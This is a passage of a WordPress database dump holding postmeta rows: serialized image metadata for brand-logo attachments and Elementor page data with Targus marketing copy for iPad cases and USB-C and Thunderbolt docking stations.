s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6566,3230,'_wp_attachment_image_alt','Mcafee'),(6567,3231,'_wp_attached_file','2018/12/Artboard-91x.png'),(6568,3231,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:682;s:4:\"file\";s:24:\"2018/12/Artboard-91x.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-91x-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Artboard-91x-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Artboard-91x-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Artboard-91x-1024x682.png\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Artboard-91x-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Artboard-91x-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Artboard-91x-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"Artboard-91x-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6569,3231,'_wp_attachment_image_alt','Lenovo'),(6570,3232,'_wp_attached_file','2018/12/Artboard-161x.png'),(6571,3232,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:682;s:4:\"file\";s:25:\"2018/12/Artboard-161x.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Artboard-161x-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Artboard-161x-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Artboard-161x-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Artboard-161x-1024x682.png\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Artboard-161x-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Artboard-161x-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Artboard-161x-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"Artboard-161x-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6572,3232,'_wp_attachment_image_alt','GotoMeeting'),(6573,3233,'_wp_attached_file','2018/12/Artboard-181x.png'),(6574,3233,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:682;s:4:\"file\";s:25:\"2018/12/Artboard-181x.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Artboard-181x-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Artboard-181x-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Artboard-181x-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Artboard-181x-1024x682.png\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Artboard-181x-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Artboard-181x-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Artboard-181x-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"Artboard-181x-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6575,3233,'_wp_attachment_image_alt','GotoTraining'),(6580,3235,'_wp_attached_file','2018/12/Artboard-11x-1.png'),(6577,3234,'_wp_attached_file','2018/12/Artboard-191x.png'),(6578,3234,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1026;s:6:\"height\";i:681;s:4:\"file\";s:25:\"2018/12/Artboard-191x.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Artboard-191x-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Artboard-191x-300x199.png\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Artboard-191x-768x510.png\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Artboard-191x-1024x680.png\";s:5:\"width\";i:1024;s:6:\"height\";i:680;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Artboard-191x-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Artboard-191x-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Artboard-191x-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"Artboard-191x-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6579,3234,'_wp_attachment_image_alt','GotoWebinar'),(6581,3235,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:682;s:4:\"file\";s:26:\"2018/12/Artboard-11x-1.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-11x-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Artboard-11x-1-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Artboard-11x-1-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"Artboard-11x-1-1024x682.png\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"Artboard-11x-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"Artboard-11x-1-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"Artboard-11x-1-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:24:\"Artboard-11x-1-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6582,3236,'_wp_attached_file','2018/12/Artboard-21x.png'),(6583,3236,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:682;s:4:\"file\";s:24:\"2018/12/Artboard-21x.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-21x-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Artboard-21x-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Artboard-21x-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Artboard-21x-1024x682.png\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Artboard-21x-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Artboard-21x-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Artboard-21x-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"Artboard-21x-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6584,3236,'_wp_attachment_image_alt','Docusign'),(6588,3237,'_wp_attachment_image_alt','Lg'),(6589,3238,'_wp_attached_file','2018/12/Artboard-171x.png'),(6590,3238,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:682;s:4:\"file\";s:25:\"2018/12/Artboard-171x.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Artboard-171x-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Artboard-171x-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Artboard-171x-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Artboard-171x-1024x682.png\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Artboard-171x-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Artboard-171x-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Artboard-171x-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"Artboard-171x-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6591,3238,'_wp_attachment_image_alt','Kofax'),(6592,3239,'_wp_attached_file','2018/12/Artboard-71x.png'),(6593,3239,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:682;s:4:\"file\";s:24:\"2018/12/Artboard-71x.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-71x-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Artboard-71x-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Artboard-71x-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Artboard-71x-1024x682.png\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Artboard-71x-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Artboard-71x-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Artboard-71x-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"Artboard-71x-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6594,3239,'_wp_attachment_image_alt','Kaspersky'),(6595,3240,'_wp_attached_file','2018/12/Artboard-121x.png'),(6596,3240,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:682;s:4:\"file\";s:25:\"2018/12/Artboard-121x.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Artboard-121x-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Artboard-121x-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Artboard-121x-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Artboard-121x-1024x682.png\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Artboard-121x-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Artboard-121x-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Artboard-121x-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"Artboard-121x-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6597,3240,'_wp_attachment_image_alt','Ergotron'),(6602,1,'_wp_page_template','default'),(6605,1,'_yoast_wpseo_primary_category',''),(6606,1,'_yoast_wpseo_content_score','30'),(8556,3606,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:8;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:8;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:13;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:2:{s:12:\"_inline_size\";i:5;s:21:\"space_between_widgets\";i:1;}}}}s:5:\"video\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_video\";a:8:{s:10:\"video_type\";i:1;s:11:\"youtube_url\";i:1;s:10:\"insert_url\";i:1;s:12:\"external_url\";i:1;s:8:\"autoplay\";i:1;s:4:\"loop\";i:1;s:8:\"controls\";i:1;s:3:\"rel\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:10;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:2;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:5:\"space\";i:4;}}}}}'),(8860,3691,'_elementor_data','[{\"id\":\"4e01da7\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"20\"},\"elements\":[{\"id\":\"542c5ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":28.378},\"elements\":[{\"id\":\"bb7c87a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/files\\/safeguard-your-valuables-safeport-rugged-ipad-case_300x300.jpg?v=1556613126\\\" alt=\\\"safeport rugged ipad case\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24999da\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":71.622},\"elements\":[{\"id\":\"d8d0705\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"h3\\\"><span style=\\\"color: #000000;\\\">Safeguard Your Valuables<\\/span><\\/h2><div class=\\\"rte-setting\\\"><p>At Targus, protecting your devices is our top priority. Tablets are easily secured with our premium collection of iPad cases and other\\u00a0tablet cases\\u00a0- including\\u00a0Field-Ready\\u00a0and\\u00a0Rugged\\u00a0options for outdoor and industrial environments. We even have laptop backpacks with hidden zippered pockets and purpose-built compartments for your keys, phone, and other personal belongings.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e49670\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1304992\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"22f0297\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"869e28f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\"},\"elements\":[{\"id\":\"554d7a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.324,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"2ddae80\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"h3\\\"><span style=\\\"color: #000000;\\\">Expand Your Potential<\\/span><\\/h2><div class=\\\"rte-setting\\\"><p>At Targus, we\\u2019re about much more than just laptop backpacks. Our docking stations offer the convenience of universal connections, providing compatibility with multiple brands including Apple (Mac), Dell, Lenovo, HP, Acer, and Asus. This enables you to quickly plug in and connect at your home office, workstation, or on the road. Give your laptop wings as you easily connect to PC accessories like external monitors, speakers, keyboard\\/mice, and laptop chargers.<\\/p><p>4K docking stations\\u00a0are the perfect companion for media and design creatives, offering a quality four times that of 1080P high-definition. Our\\u00a0dual display universal docking stations hook up to two monitors for accelerated productivity and ease of transition between documents. You can find all the cables, adapters, and storage trays you need in our collection of docking station accessories.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ab11fdc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.676},\"elements\":[{\"id\":\"5677e5f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignleft\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/files\\/expand-your-potential-dock520usz-quad-docking-station_300x300.jpg?v=1556613316\\\" alt=\\\"expand your potential dock quad docking station\\\" width=\\\"519\\\" height=\\\"348\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bfcf376\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e6a7498\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"76d9e25\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9bceb31\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6ba22f6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"820d50e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Docking Stations\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5abbfc0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"b0cb8c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83d2369\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>USB-C\\u2122 Universal QUAD HD (QVHD) Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK520USZ)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ec5cce0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e58be5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C\\u2122 Universal DV4K Docking Station with 100W Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK190AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"20620af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7e6c96e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Thunderbolt\\u2122 3 DV4K Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: 